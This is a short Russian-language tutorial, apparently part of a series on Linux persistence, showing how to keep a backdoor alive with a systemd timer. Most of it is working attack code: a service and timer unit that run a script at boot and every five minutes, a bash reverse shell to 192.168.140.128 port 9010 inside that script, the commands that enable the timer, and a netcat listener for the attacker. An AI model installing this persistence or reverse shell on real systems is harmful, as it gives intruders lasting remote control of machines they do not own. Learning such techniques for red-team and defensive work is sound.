# 06 - Systemd Timers

Это пример закрепления точно такой же как и предыдущий, но systemD службы могут запускаться и по расписанию, что гораздно удобнее. Этим мы и воспользуемся.\
Для этого нам нужно создать 3 файла: 

1. Файл службы systemD
2. Файл с расписанием для этой службы
3. Файл вредоносного скрипта

```bash
// Создаем сервис /etc/systemd/system/backdoor.service
[Unit]

Description=backdoor service

[Service]

ExecStart=/opt/backdoor.sh
```

```bash
// Создаем для сервиса таймер /etc/systemd/system/backdoor.timer
[Unit]

Description=backdoor timer

[Timer]

OnBootSec=5

OnUnitActiveSec=5m

[Install]

WantedBy=timers.target
```

```bash
// Вредоносный скрипт /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1
```

Перазапустим службы и включим наш таймер

```bash
//
systemctl daemon-reload
systemctl enable backdoor.timer
systemctl start backdoor.timer
systemctl list-timers 
```

```bash
// На хосте атакующего запускам netcat 
nc -lvp 9010
```

Теперь через каждые 5 минут будет стартовать наша служба, которая стартанет вредоносный скрипт, а он в свою очередь отдаст нам шел.

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2FHcNzzfxeMJhOb8gN0BbX%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=d1fde102-2da7-4568-9aaf-165ec3510dfd" alt=""><figcaption></figcaption></figure>